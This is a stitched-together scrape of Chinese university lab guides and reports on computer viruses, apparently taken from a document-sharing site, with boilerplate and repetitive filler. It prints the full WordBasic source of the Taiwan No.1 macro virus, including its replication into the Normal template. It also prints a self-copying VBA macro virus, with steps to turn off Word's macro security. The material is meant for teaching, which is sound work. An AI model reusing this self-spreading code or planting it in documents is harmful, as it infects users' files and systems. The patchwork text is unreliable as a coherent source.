计算机病毒原理-台湾1号病毒实验报告
病毒实验指导书
![病毒实验指导书](https://img.taocdn.com/s3/m/f341ba373968011ca3009173.png)
病毒实验指导书上海交通大学信息安全工程学院2010年10月目录1、引导区病毒2、可执行文件病毒2.1 COM病毒2.2 PE病毒3、宏病毒3.1 美丽莎宏病毒3.2 台湾No.1宏病毒4、恶意脚本4.1 网络炸弹脚本4.2万花谷脚本4.3欢乐时光脚本5、蠕虫5.1 U盘蠕虫5.2 RPC漏洞蠕虫六、木马6.1 基本木马程序6.2 BO2K木马七、恶意代码检测实验附录一:虚拟机下安装DOS一、引导区病毒1.1 实验目的通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染染毒文件的方法,提高汇编语言的使用能力。
1.2 实验原理本实验采用的引导病毒样本是一个教学版的样本,引导含有这个病毒的软盘或硬盘都将触发它。
该病毒并不会做什么破坏,被感染的软盘或硬盘都可以恢复。
1.3 预备知识本实验需要如下的预备知识:1.引导病毒的基础知识,包括引导病毒的概念,引导扇区的位置和结构等。
2.BIOS常用中断的相关知识,包括对磁盘的读写和屏幕字符的打印等。
3.汇编语言基础,能独立阅读和分析汇编代码,掌握常用的汇编指令。
1.4 实验内容本实验需要完成的内容如下:1.引导阶段病毒由软盘感染硬盘实验。
通过触发病毒,观察病毒发作的现象和步骤学习病毒的感染机制;阅读和分析病毒的代码。
2.Dos运行时病毒由硬盘感染软盘的实现。
通过触发病毒,观察病毒发作的现象和步骤学习病毒的感染机制;阅读和分析病毒的代码。
1.5 实验环境VMWare Workstation 5.5.3MS-DOS 7.10实验素材:experiments目录下的bootvirus目录。
虚拟机:virtualmachine目录下的DOSVM目录。
1.6 实验步骤1.环境安装安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。
安装步骤参考附录“如何在虚拟机上安装MSDOS?”如果直接下载虚拟机映像文件,则可以省去该部分。
计算机病毒实验报告-1
![计算机病毒实验报告-1](https://img.taocdn.com/s3/m/205ba407763231126edb11a1.png)
病毒理论与防御技术实验报告2015年3月1日实验一:**********一、实验目的1)掌握PE文件格式。
2)了解PE病毒原理。
二、实验步骤1)阅读CVC杂志。
2)学习使用PE Explorer查看不同PE结构文件格式,如exe和dll。
3)文件型病毒演练。
a)实验测试的示例程序包由教师提供,解压后请从病毒包中取得Virus.exe拷贝在当前解压目录中即可运行病毒程序进行测试。
b)为了保持测试的一般性,我们采用的是一个常见的软件ebook;该测试包即为ebook安装目录下的所有程序。
c)测试时请依照软件提示进行,在测试中,我们发现该测试包还具有典型性特点:其中ebookcode.Exe 和 KeyMaker.exe 可以看成一组,它们在感染后能够明显的体现病毒的基本特征,故而杀毒软件Norton能够比较及时的查出是病毒程序;而ebookedit.exe 和 ebrand-it.exe 是另一类程序,它们在感染后很好地体现了病毒的隐藏的特征,在运行初期,杀毒程序很难查出其为病毒程序,只有在该程序感染其他可执行程序,在宿主程序中添加4k的节时,杀毒软件检测到该行为时才能判断是病毒程序。
三、思考题1、详细记录实验步骤、现象、问题。
实验现象:1)PE文件格式按节组织(section)->中病毒之后section number变多(多了一个IS节)中病毒之后Address of entry point程序入口点变化(调用子程序SUB_L0066D58B)2)中病毒文件中病毒文件也具有了感染其他文件的功能。
●病毒重定位:原因:病毒的生存空间就是宿主程序,而因为宿主程序的不同,所以病毒每次插入到宿主程序中的位置也不同。
那么病毒需要用到的变量的位置就无法确定。
这就是病毒首先要重定位的原因。
目的:找到基址举例:在几乎每个病毒的开头都用下面的语句:call deltadelta:pop ebp ;得到delta地址sub ebp,offset delta ;因为在其他程序中基址可能不是默认的所以需要重定位mov dword ptr [ebp+offset appBase],ebp;把扩展基址寄存器ebp中的内容(基址)存入内存appBase位置●API函数地址的获取:步骤:首先获得诸如kernel32.dll,user32.dll的基址,然后再找到真正的函数地址.2、写下你阅读CVC杂志后的读后感,你同意杂志的所表达的倾向吗,你觉得现阶段病毒肆虐和这样的倾向和认识有没有关系,为什么?CVC杂志很有意思,语言幽默,观点明确,并且总结了很多关于病毒的基础知识。
电脑病毒与防治实验报告
![电脑病毒与防治实验报告](https://img.taocdn.com/s3/m/8cdfaafc64ce0508763231126edb6f1aff0071a0.png)
电脑病毒与防治实验报告电脑病毒是一种在计算机系统中传播并破坏数据或干扰正常运行的恶意软件。
在当今数字化社会,电脑病毒越来越成为人们日常生活中的一个隐患。
为了更好地了解电脑病毒的危害以及有效防治方法,我们进行了相关实验并撰写此报告。
### 实验目的通过实验,探讨电脑病毒对计算机系统的危害程度,以及采取何种方法可以有效防治电脑病毒的侵害。
### 实验材料1. 实验室计算机设备2. 各类电脑病毒样本3. 杀毒软件4. 防火墙软件### 实验步骤1. 收集各类型电脑病毒样本,包括文件病毒、网页病毒、邮件病毒等。
2. 将病毒样本分别输入实验室的计算机系统中,观察病毒对系统的影响。
3. 安装杀毒软件,并对感染病毒的计算机进行查杀和清除操作。
4. 启动防火墙软件,设置相关防护策略,阻止病毒入侵计算机系统。
5. 对比有无杀毒软件和防火墙软件的情况下,电脑系统的表现和安全性。
### 实验结果分析经过实验观察和对比分析,我们得出以下结论:1. 电脑病毒的危害程度较大,不仅会导致系统运行缓慢、文件丢失、数据泄露等问题,还可能对计算机系统进行破坏,使其无法正常使用。
2. 安装杀毒软件和启用防火墙软件是预防电脑病毒的有效措施。
杀毒软件可以及时查杀发现的病毒,防火墙软件可以阻止病毒入侵系统。
3. 电脑系统在有杀毒软件和防火墙软件保护下,运行更加稳定,数据更加安全,用户体验更好。
### 实验结论综上所述,电脑病毒对计算机系统的危害不可忽视,因此加强对电脑病毒的防治至关重要。
安装杀毒软件和防火墙软件是预防和治理电脑病毒的有效手段,建议广大用户定期更新杀毒软件和防火墙软件,并加强对网络安全的重视,保护个人和机构的信息安全。
通过本次实验,我们对电脑病毒及其防治方法有了更深入的了解,相信在未来的计算机使用中,将更加注重网络安全,提高电脑系统的安全防护意识。
愿我们的实验报告能为更多人提供有益的参考和启示。
台湾一号
![台湾一号](https://img.taocdn.com/s3/m/35cc12ef0975f46527d3e158.png)
台湾No.1病毒程序流程图:宏病毒实例分析:台湾No.1病毒源代码:Dim Shared nm(4)Sub MAINDisableInput 1 ‘禁止使用Ctrl+Break键If Day(Now())=13 Then ‘判断当前是否是13号try:On Error Goto 0 ‘关闭错误处理程序On Error Goto trytest=-1con=1 ‘con储存心算题的结果tog$=””‘题目字符串,显示在提示框中i=0While test=-1For i=0 to 4nm(i)=Int(Rnd()*10000) ‘产生5个随机整数con=con*nm(i) ‘计算累乘结果If i=4 Then ‘当产生完5个数后,将第五个数和tog$=tog$+Str$(nm(4))+”=?”“=?”加入tog$中,完成题目的产生Goto beg ‘转到beg标记处End iftog$=tog$+Str$(nm(i))+”*”‘将每次产生的数添加到tog$中Next ibeg:Beepans$=InputBox$(“今天是”+Date$()+”,跟你玩一个心算游戏”+Chr$(13)+”若你答错,只好接受震撼教育………………”+Chr$(13)+tog$,”台湾No.1 Macro Virus”) ‘弹出输入框,给出问题,等待用户输入答案,并将答案返回给ans$If RTrim$(LTrim$(ans$))=LTrim$(Str$(con)) Then‘判断输入的答案是否与ans$一样MsgBox “恭贺你答对了,按确定就告诉你想知道的……”,”台湾No.1 Macro Virus”FileNewDefault ‘若答对了,打开一个空白页CenterPara ‘居中显示FormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1‘设置字体格式BeepInsert “何为巨集病毒”‘插入字符串InsertPara ‘插入段落,即换行BeepInsert “答案:”Italic 1 ‘设为斜体Insert “我就是……”InsertParaInsertParaItalic 0 ‘取消斜体FormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1BeepInsert “如何预防巨集病毒”InsertParaBeepInsert “答案:”Italic 1Insert “不要看我……”Goto exit ‘转到exit标记,退出程序ElseFor j=1 to 20 ‘若答错,打开20个空白文档BeepFileNewDefaultNext jCenterParaFormatFont.Font=”细明体”,.Points=16,.Bold=1,.Underline=1Insert “巨集病毒”Goto try ‘打开完后转到try标记处End ifWendEnd if ‘破坏性代码结束nor=CountMacros(0) ‘计算Normal模版中的模块数目If nor>0 ThenFor kk=1 to norIf MacroName$(kk,0)=”AutoOpen” Then ‘Normal模版中有无AutoOpen宏t=1 ‘若有则将t标记为1End ifNext kkEnd ifFile$=FileName$() ‘获取当前文档的全名Feilm$=File$+”:AutoOpen”‘当前文档中的宏名If t<>1 Then ‘若没有AutoOpen宏则将文档中的MacroCOPY Filem$,”AutoOpen”宏复制自动宏MacroCOPY Filem$,”AutoNew”MacroCOPY Filem$,”AutoClose”End ifnor1=CountMacros(1) ‘计算当前文档中包含的模块数If nor1>0 ThenFor kkk=1 to nor1If MacroName$(kkk,1)=”AutoOpen” Then ‘当前文档中有无AutoOpen宏tt=1 ‘若有则将tt标记为1End ifNext kkkEnd ifIf tt<>1 Then ‘若没有AutoOpen宏则先将文档保FileSaveAs.Format=1 存为模版再把自身复制到文档中MacroCOPY ”AutoOpen”,Filem$End ifexit:End Sub。
计算机病毒实验报告
![计算机病毒实验报告](https://img.taocdn.com/s3/m/302b2d3f26284b73f242336c1eb91a37f1113215.png)
计算机病毒实验报告计算机病毒实验报告引言:计算机病毒是一种恶意软件,可以对计算机系统造成破坏和损失。
为了更好地了解计算机病毒的特点和对计算机系统的影响,我们进行了一系列的实验。
本报告将详细介绍我们的实验过程、结果和结论。
实验一:病毒传播方式我们首先研究了计算机病毒的传播方式。
通过在一个封闭的网络环境中模拟实验,我们发现计算机病毒主要通过电子邮件、可移动存储设备和互联网下载等方式进行传播。
这些传播方式都依赖于用户的不慎操作或者系统的漏洞。
实验二:病毒对系统性能的影响我们接着研究了计算机病毒对系统性能的影响。
在一个实验环境中,我们分别在未感染和感染病毒的计算机上进行了性能测试。
结果显示,感染病毒的计算机在运行速度、响应时间和网络连接方面都明显下降。
这是因为计算机病毒会占用系统资源、干扰正常的进程和网络通信。
实验三:病毒防护措施为了更好地保护计算机系统免受病毒攻击,我们进行了一系列的病毒防护措施实验。
我们测试了不同的杀毒软件和防火墙,并对其进行了性能和效果的评估。
结果显示,合适的杀毒软件和防火墙可以有效地检测和阻止病毒的传播,保护计算机系统的安全。
实验四:病毒对个人隐私的威胁除了对系统性能的影响,计算机病毒还可能对个人隐私造成威胁。
我们进行了一项实验,模拟了一个病毒窃取个人信息的场景。
通过在一台计算机中安装了一个窃取密码的病毒,我们发现该病毒能够成功获取用户的登录信息和敏感数据。
这个实验结果提醒我们,保护个人隐私是非常重要的,我们应该谨慎对待未知来源的文件和链接。
结论:通过一系列的实验,我们对计算机病毒有了更深入的了解。
计算机病毒的传播方式多种多样,主要依赖于用户的不慎操作和系统的漏洞。
感染病毒会导致计算机系统性能下降,并可能对个人隐私造成威胁。
为了保护计算机系统的安全,我们应该采取合适的病毒防护措施,如安装杀毒软件和防火墙,并且要时刻保持警惕,不轻易打开未知来源的文件和链接。
总结:计算机病毒是现代计算机系统中的一大威胁,对系统性能和个人隐私都有着巨大的影响。
计算机病毒实验报告
![计算机病毒实验报告](https://img.taocdn.com/s3/m/9bd51a581a37f111f0855b9f.png)
计算机病毒实验报告(最新版)编制人:__________________审核人:__________________审批人:__________________编制单位:__________________编制时间:____年____月____日序言下载提示:该文档是本店铺精心编制而成的,希望大家下载后,能够帮助大家解决实际问题。
文档下载后可定制修改,请根据实际需要进行调整和使用,谢谢!并且,本店铺为大家提供各种类型的实用范文,如报告范文、工作总结、文秘知识、条据书信、行政公文、活动报告、党团范文、其他范文等等,想了解不同范文格式和写法,敬请关注!Download tips: This document is carefully compiled by this shop. I hope that after downloading it, it can help you solve practical problems. The document can be customized and modified after downloading, please adjust and use it according to actual needs, thank you!In addition, this shop provides you with various types of practical sample essays, such as report sample essays, work summary, secretarial knowledge, article letters, administrative official documents, activity reports, party group sample essays, other sample essays, etc. I want to understand the format and writing of different sample essays. stay tuned!正文内容说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
计算机病毒实验报告
![计算机病毒实验报告](https://img.taocdn.com/s3/m/b4fe9aae0875f46527d3240c844769eae009a3ff.png)
计算机病毒实验报告
《计算机病毒实验报告》
近年来,计算机病毒成为了网络安全的重要问题。
为了深入研究计算机病毒的特性和对网络系统的影响,我们进行了一系列的实验。
在实验中,我们选择了几种常见的计算机病毒样本,并对其进行了分析和测试。
首先,我们对这些病毒样本进行了静态分析,包括对其代码结构、功能特性和传播途径的研究。
通过反汇编和代码审查,我们成功地分析出了这些病毒的工作原理和传播方式。
我们发现,这些病毒样本大多采用了文件传播和网络传播的方式,利用漏洞和弱密码等手段感染目标系统。
其次,我们对这些病毒样本进行了动态分析,包括在受控环境下的运行实验和行为监测。
通过在虚拟机环境中模拟感染过程,我们成功地捕获了这些病毒的行为数据,并对其进行了深入分析。
我们发现,这些病毒样本在感染目标系统后,会对系统文件进行篡改、窃取用户信息或者发起网络攻击等恶意行为。
最后,我们对这些病毒样本进行了安全性测试,包括针对其传播途径和感染后的影响进行了模拟实验。
通过在受控网络环境中模拟病毒传播和感染过程,我们成功地验证了这些病毒的危害性,并提出了相应的防范措施和安全建议。
通过这些实验,我们深入了解了计算机病毒的特性和对网络系统的影响,为进一步加强网络安全提供了重要的数据支持和科学依据。
我们希望通过我们的研究成果,能够为网络安全领域的相关工作提供有益的参考和借鉴,共同维护网络安全和信息安全的大局。
关于电脑病毒的研究报告
![关于电脑病毒的研究报告](https://img.taocdn.com/s3/m/b114a00a844769eae009edcb.png)
电脑病毒的危害及防御1102班组长:周家炜一、问题的提出。
我家的电脑有时候会中病毒,病毒会使电脑的网速变慢,电脑还会经常死机。
不少同学家里的的电脑也会中病毒,病毒给我们带来了不少麻烦。
所以,我对电脑病毒这一问题,做了个简单的研究调查。
二、研究调查的数据整理。
1、电脑病毒的认识和了解。
计算机病毒(Computer Virus)在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,病毒指“编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。
而在一般教科书及通用资料中被定义为:利用计算机软件与硬件的缺陷,由被感染机内部发出的破坏计算机数据并影响计算机正常工作的一组指令集或程序代码。
计算机病毒最早出现在70年代David Gerrold 科幻小说When H.A.R.L.I.E. was One.最早科学定义出现在1983:在Fred Cohen (南加大) 的博士论文“计算机病毒实验”“一种能把自己(或经演变)注入其它程序的计算机程序”启动区病毒,宏(macro)病毒,脚本(script)病毒也是相同概念传播机制同生物病毒类似.生物病毒是把自己注入细胞之中。
电脑病毒是一些心术不正的人恶意制造的电脑程序。
它对电脑进行不同程度的破坏,一些木马程序能在人们不知情的情况下潜入电脑盗取他人信息,或对电脑实行非法控制。
制造电脑病毒就像投毒一样,是一种危害社会的犯罪行为。
目前,已经发现的电脑病毒种类越来越多,像“熊猫烧香”病毒、“CIH”病毒、“冲击波”病毒、QQ消息尾巴病毒等。
2、电脑病毒的传播途径。
电脑病毒主要是以附件的形式进行传播,由于人们可以将任何类型的文件做为附件发送,而大部分电脑病毒防护软件在这方面的功能也不是十分完善,使得电子邮件成为当今世界上传播电脑病毒最主要的途径。
主要通过复制文件,文件传送,运行程序等方式进行。
它的传播媒介主要有以下几种;(1)硬盘传播:由于带病毒的硬盘在本地或者移到其他地方使用,维修等被病毒传染并将其扩散。
计算机病毒的实验报告
![计算机病毒的实验报告](https://img.taocdn.com/s3/m/166c104303020740be1e650e52ea551810a6c9c1.png)
计算机病毒的实验报告计算机病毒的实验报告摘要:计算机病毒是一种具有破坏性的恶意软件,能够感染计算机系统并对其进行破坏。
本实验通过模拟计算机病毒的传播过程,探究病毒的特性和防范措施。
实验结果表明,计算机病毒具有隐蔽性、传播性和破坏性,而防病毒软件和用户的安全意识是有效防范计算机病毒的重要手段。
引言:随着计算机技术的不断发展,计算机病毒作为一种具有破坏性的恶意软件,给计算机系统的安全带来了巨大威胁。
为了深入了解计算机病毒的特性和传播方式,本实验模拟了计算机病毒的传播过程,并对病毒的特性进行了研究。
实验方法:1. 实验环境:使用一台具备网络连接功能的计算机作为实验主机。
2. 实验过程:在实验主机上安装一个模拟计算机病毒的程序,并设置病毒传播路径。
3. 实验观察:观察计算机病毒在实验主机上的传播情况,记录病毒感染的时间和影响范围。
4. 实验分析:分析计算机病毒的传播速度、感染方式和破坏程度。
实验结果:通过实验观察和数据记录,我们得到了以下实验结果:1. 计算机病毒的传播速度较快:在实验主机上设置病毒传播路径后,病毒很快感染了整个计算机系统,包括操作系统和应用程序。
2. 计算机病毒具有隐蔽性:病毒在感染过程中能够隐藏自身,不易被用户察觉。
这使得病毒能够长时间存在于计算机系统中,对系统进行潜在的破坏。
3. 计算机病毒的传播方式多样:病毒可以通过网络传播,如电子邮件、恶意链接等;也可以通过可移动存储介质传播,如U盘、移动硬盘等。
这些传播方式使得病毒能够迅速传播到其他计算机系统,形成病毒的流行。
4. 计算机病毒的破坏程度较大:病毒在感染计算机系统后,可以破坏文件、删除重要数据、篡改系统设置等,给用户带来严重的损失。
实验讨论:通过以上实验结果,我们可以得出以下结论:1. 防病毒软件是有效防范计算机病毒的重要手段。
及时更新病毒库、进行定期扫描和实时监测,可以有效阻止病毒的感染和传播。
2. 用户的安全意识也是防范计算机病毒的重要因素。
计算机病毒与防治实验
![计算机病毒与防治实验](https://img.taocdn.com/s3/m/cd52e7b6fd0a79563c1e729b.png)
计算机病毒原理及其防范实验报告学院专业:理学院信息安全学号:1108105075姓名:李建涛木马病毒1基本木马程序1.1 实验目的掌握木马病毒的基本原理。
1.2 实验原理用木马程序进行网络入侵,从过程上看大致可分为六步:配置木马(实现伪装和信息反馈)、传播木马(通过E-mail 、病毒和软件等)、运行木马、信息获取、建立连接和远程控制(实现对受害者的控制)。
其中建立连接的过程如图6-1-1所示。
B A 控制端服务端(1)建立连接前202.120.0.100①②③④①控制端I P ②木马端口③服务端端口④服务端I P?(2)获得服务器端I P(3)木马连接建立A B76 26202.120.0.100202.99.99.10110 37通过信息 反馈或I P 扫描获得服 务器I P 地址76 26图6-1-1 木马建立连接示意图在图6-1-1中,A 机为控制端,B 机为服务端。
对于A 机来说,要与B 机创建连接就必须知道B 机的木马端口和IP 地址,由于木马端口是A 机事先设定的,所以最重要的是如何获得B 机的IP 地址。
获得B 机的IP 地址的方法主要有两种:信息反馈和IP 扫描。
信息反馈是指服务端主动反馈信息给控制端。
因为B 机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A 机只要扫描IP 地址段中7626端口开放的主机就行了。
图中B 机的IP 地址是202.96.96.101,当A 机扫描到这个IP 时发现它的7626端口是开放的,那么这个IP 就会被添加到列表中,这时A 机就可以通过木马的控制端程序向B 机发出连接信号,B 机中的木马程序收到信号后立即作出响应,当A 机收到响应的信号后,开启一个随即端口1031与B 机的木马端口7626建立连接,这时一个木马连接才算真正建立。
由于拨号上网的IP 是动态的,即每次上网的IP 都是不同的,但是这个IP 是在一定范围内变动的,因此,一般来说控制端都是先通过信息反馈获得服务端的IP 地址,然后再进行IP 扫描。
计算机病毒的实验报告
![计算机病毒的实验报告](https://img.taocdn.com/s3/m/1cb1ef9bac51f01dc281e53a580216fc710a5348.png)
计算机病毒的实验报告
《计算机病毒的实验报告》
近年来,计算机病毒的威胁日益增加,给人们的生活和工作带来了不小的困扰。
为了更好地了解和应对计算机病毒的威胁,我们进行了一系列实验,以便更好
地理解和研究计算机病毒的特性和行为。
首先,我们在一台未安装任何杀毒软件的计算机上进行了实验。
我们通过下载
一些来自不明来源的文件和软件,以模拟用户在日常使用计算机时可能遇到的
情况。
结果显示,在没有杀毒软件的情况下,计算机很快就被感染了,并且出
现了各种各样的问题,如程序崩溃、文件丢失等。
接着,我们安装了一款知名的杀毒软件,并再次进行了实验。
这次,我们下载
了相同的文件和软件,并观察了杀毒软件的反应。
结果显示,杀毒软件能够及
时发现并清除潜在的病毒,保护了计算机的安全。
通过这些实验,我们得出了一些结论。
首先,计算机病毒的威胁不可小觑,用
户在日常使用计算机时应当保持警惕,避免下载和安装未知来源的文件和软件。
其次,安装一款可靠的杀毒软件是保护计算机安全的重要手段,能够及时发现
和清除潜在的病毒,保护计算机的安全。
在未来,我们将继续进行相关实验和研究,以更好地了解和应对计算机病毒的
威胁,为用户提供更好的安全保障。
希望通过我们的努力,能够减少计算机病
毒给人们带来的困扰,保护用户的计算机安全。
实验五类TaiWanNO.1病毒实验
![实验五类TaiWanNO.1病毒实验](https://img.taocdn.com/s3/m/749ad3cbd05abe23482fb4daa58da0116c171f7c.png)
实验五类TaiWanNO.1病毒实验实验五类TaiWan NO.1病毒实验1.实验⽬的Word宏是指能组织到⼀起为独⽴命令使⽤的⼀系列Word指令,它能使⽇常⼯作变得容易。
本实验演⽰了宏的编写,通过两个简单的宏病毒⽰例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作⽤机制,从⽽加强对宏病毒的认识,提⾼防范意识。
2.实验所需条件和环境硬件设备:局域⽹,终端PC机。
系统软件:Windows系列操作系统⽀撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在⼯具→宏→安全性中,将安全级别设置为低,在可靠发⾏商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项⽬的访问实验环境配置如下图所⽰:受感染终端被感染终端宏病毒传播⽰意图3.实验内容和分析为了保证该实验不⾄于造成较⼤的破坏性,进⾏实验感染后,被感染终端不要打开过多的word⽂档,否则清除⽐较⿇烦(对每个打开过的⽂档都要清除)。
3.1. 例1 ⾃我复制,感染word公⽤模板和当前⽂档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开⼀个word⽂档,然后按Alt+F11调⽤宏编写窗⼝(⼯具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输⼊以上代码,保存,此时当前word⽂档就含有宏病毒,只要下次打开这个word⽂档,就会执⾏以上代码,并将⾃⾝复制到Normal.dot(word⽂档的公共模板)和当前⽂档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前⽂档为Document_Open),此时所有的word⽂档打开和关闭时,都将运⾏以上的病毒代码,可以加⼊适当的恶意代码,影响word的正常使⽤,本例中只是简单的跳出⼀个提⽰框。
计算机病毒实验
![计算机病毒实验](https://img.taocdn.com/s3/m/ae1a28fa647d27284a735166.png)
计算机病毒实验报告一、实验目的(1)掌握常见几种病毒的基本原理(2)掌握清除病毒的方法(3)学会使用几种常见病毒进行基本编程的技术二、实验内容分别用PE病毒,欢乐时光脚本病毒,梅丽莎宏病毒,台湾宏病毒,万花谷脚本病毒,网络炸弹脚本病毒进行感染和病毒清除实验。
三、实验环境信息安全综合实验系统操作系统:WINDOWS2000JDK版本:Java Standard Edition 1.4.0以上数据库:Mysql开发语言:JSPWeb服务器:TomacatOffice版本:MS office2000/2003四、实验结果1、网络炸弹(1)实验原理网页恶意代码确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。
这种病毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,使非常多的用户遭受损失。
“网络炸弹”是一种网页恶意代码,可以无限次得弹出固定窗口来达到侵占客户机系统资源,最终导致客户端死机的结果。
(2)结果演示1、修改IE的安全级别图1 修改IE安全级别2、修改注册表的安全设置图2 修改IE安全设置3、网络炸弹感染图3 网络炸弹感染4、网络炸弹源码图4 网络炸弹源码2、万花谷脚本病毒(1)实验原理JS.On888 脚本病毒(俗称“万花谷”病毒)实际上是一个含有恶意脚本代码的网页文件,其脚本代码具有恶意破坏能力,但并不含有传播性。
实验病毒为模仿它所写成的类“万花谷”病毒,减轻了病毒危害。
(2)结果演示1、修改IE的安全级别2、万花谷病毒感染图5 万花谷病毒感染-1图6 万花谷病毒感染-2图7 万花谷病毒感染-3图8 万花谷病毒源码3、欢乐时光脚本病毒(1)实验原理病毒程序嵌入在实验系统页面的脚本中,但受到界面脚本的控制与调用,实现通过用户的界面操作来触发病毒的感染,加解密和杀毒脚本,并有不同的操作引导三项实验的不同结果。
(2)结果演示1、修改IE安全级别2、病毒感染图9 欢乐时光病毒感染4、梅丽莎宏病毒(1)实验原理美丽莎宏病毒实际上是一个含有恶意代码的Word自动宏,其代码具有恶意传播繁殖能力,能够造成网络邮件风暴,造成邮件服务器瘫痪。
计算机病毒实验报告
![计算机病毒实验报告](https://img.taocdn.com/s3/m/15c00d35cbaedd3383c4bb4cf7ec4afe04a1b1cf.png)
计算机病毒实验报告1. 实验目的通过本次实验,我们的目的是了解计算机病毒的基本概念、特征及分类,掌握常用的杀毒软件的使用方法,并了解病毒对计算机的影响,从而增强对计算机安全的认识。
2. 实验环境本次实验我们使用的计算机环境为Windows 10操作系统,实验所用的杀毒软件为360安全卫士。
3. 实验过程3.1 计算机病毒的概念计算机病毒是指那些在计算机系统中侵入并产生破坏、破坏、传播等行为的程序和代码。
计算机病毒可分为多种类型,包括文件病毒、网络病毒、驱动器病毒等。
3.2 计算机病毒的特征计算机病毒有以下几种特征:•潜伏性:病毒在计算机系统中往往不会马上制造破坏,而是先潜伏一段时间,等待某些条件的满足后再进行攻击;•传染性:计算机病毒通过文件、网络等方式进行传播,有蔓延性;•破坏性:计算机病毒会对系统、软件或数据等进行破坏;•隐匿性:很多病毒会将自己隐藏在计算机系统的某些位置,难以被发现;•多样性:计算机病毒可以通过不断变化自身的形态等方式来规避杀软的检测。
3.3 计算机病毒的分类根据病毒的传播方式和感染对象,计算机病毒可以分为多种类型,包括文件病毒、网络病毒、木马病毒、蠕虫病毒等。
3.4 常用的杀毒软件在本次实验中,我们使用了360安全卫士这一国内常用的杀毒软件。
该软件不仅可以实现基本的病毒查杀功能,还可以对各种病毒进行拦截和清除。
3.5 实验结果通过本次实验,我们成功地了解了计算机病毒的基本概念、特征及分类,掌握了常用的杀毒软件的使用方法,并对病毒对计算机的影响有了一定的认识。
4. 实验结论计算机病毒是一种具有传染性、破坏性、隐匿性等特征的程序,对计算机系统和数据安全构成威胁。
通过学习本次实验,我们可以提高对计算机安全的认识,掌握常用的杀毒软件的使用方法,并加强对计算机安全的保护。
计算机病毒原理台湾1号病毒实验报告
![计算机病毒原理台湾1号病毒实验报告](https://img.taocdn.com/s3/m/921dd0a6e45c3b3566ec8b5b.png)
计算机病毒实验报告姓名:学号:老师:日期:一. 实验目的台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
二. 实验内容1. macro virus中的内容2.计算机病毒篇 ---->计算机宏病毒三. 实验环境1. macro virus硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.实验环境配置如下图所示:受感染终端受感染Word文档被感染终端2.计算机宏病毒硬件设备:部署 WIN2003 系统的PC 机一台软件工具:Office word2007四.实验步骤及截图台湾1号病毒代码Taiwan No.1 病毒原始码Dim Shared nm(4)Sub MAINDisableInput 1If Day(Now()) = 13 Thentry:On Error Goto 0On Error Goto trytest = - 1con = 1tog$ = ""i = 0While test = - 1For i = 0 To 4nm(i) = Int(Rnd() * 10000)con = (con * nm(i))If i = 4 Thentog$ = tog$ + Str$(nm(4)) + " =?"Goto begEnd Iftog$ = tog$ + Str$(nm(i)) + " *"Next irem 随机选出四个千位数, 以便等一下的游戏Beeprem 电脑发出" 哔"一声ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /"若你答错,只好接受震撼教育.............." + Chr$(13) + /tog$, "台湾NO.1 Macro Virus")rem 开个对话盒, 以便输入解答用If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) ThenMsgBox "恭贺你答对了,按确定就告诉你想知道的....", /"台湾NO.1 Macro Virus"FileNewDefaultCenterParaFormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 BeepInsert "何谓巨集病毒?"InsertParaInsert "答案:"Italic 1Insert "我就是....."InsertParaInsertParaItalic 0FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 BeepInsert "如何预防巨集病毒?"InsertParaBeepInsert "答案:"Italic 1Insert "不要看我....."Goto exitElseFor j = 1 To 20BeepFileNewDefaultNext jCenterParaFormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"Goto tryEnd IfWendEnd Ifnor = CountMacros(0)If nor > 0 ThenFor kk = 1 To norIf MacroName$(kk, 0) = "AutoOpen" Then t = 1End IfNext kkEnd Iffile$ = FileName$()filem$ = file$ + ":AutoOpen"If t <> 1 ThenMacroCopy filem$, "AutoOpen"MacroCopy filem$, "AutoNew"MacroCopy filem$, "AutoClose"End Ifnor1 = CountMacros(1)If nor1 > 0 ThenFor kkk = 1 To nor1If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1End IfNext kkkEnd IfIf tt <> 1 ThenFileSaveAs .Format = 